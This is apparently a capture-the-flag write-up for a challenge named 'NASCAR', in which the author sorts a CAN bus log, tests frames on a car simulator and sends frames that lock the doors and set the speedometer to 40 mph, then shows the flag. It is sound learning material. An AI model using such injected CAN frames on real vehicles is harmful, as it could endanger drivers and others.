# NASCAR
#canbus

```
This is Stage 4 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.

CONSTELLATIONS employees rejoice, NASCAR has developed a cloud solution to control cars remotely! You are headed to a race and need to get up and running. Here are some logs that might help you get started.

Download the file below and press the Start button on the top-right to begin this challenge.

Connect with:
nc challenge.nahamcon.com 31333
```

We get a filecanbus.log containing a dump of CAN bus messages. When logging in to the challenge, we get a prompt

```
$ nc challenge.nahamcon.com 31333

_ _____ _____ _________ ____
/ | / / | / ___// ____/ | / __ \
/ |/ / /| | \__ \/ / / /| | / /_/ /
/ /| / ___ |___/ / /___/ ___ |/ _, _/
/_/ |_/_/ |_/____/\____/_/ |_/_/ |_|

Please send the CAN codes to:

1. Lock the car
2. Set the MPH speed display to 40 mph
```

The dump is very noisy and contains a lot of values. Let us create one with only unique entries.

```
$ sort --unique canbus.log > unique_canbus.log
```

_Now... there are two ways we could have gone about this. And that is to just try each unique CAN bus ID# with some number. Instead, I decided to read up a bit_

What I eventually found is a CAN bus simulator for cars. I spun that up on a VM and did some testing there. For example, I found that if I sent the command:

```
$ while true; do cansend vcan0 244#0000001800; done
```

The speedometer went to 40 MPH. And if I tried the values found in the log for `19B#` then the doors would lock. Connecting and inputting those values then produced the flag

```
1: 19B#00000F000000
Nice! Now let's get up to speed!
2: 244#0000001800
You are off to the races! Here's the flag they waved as you sped by:
flag{e056ee2f338a63d03a2e47aefebf178f}
```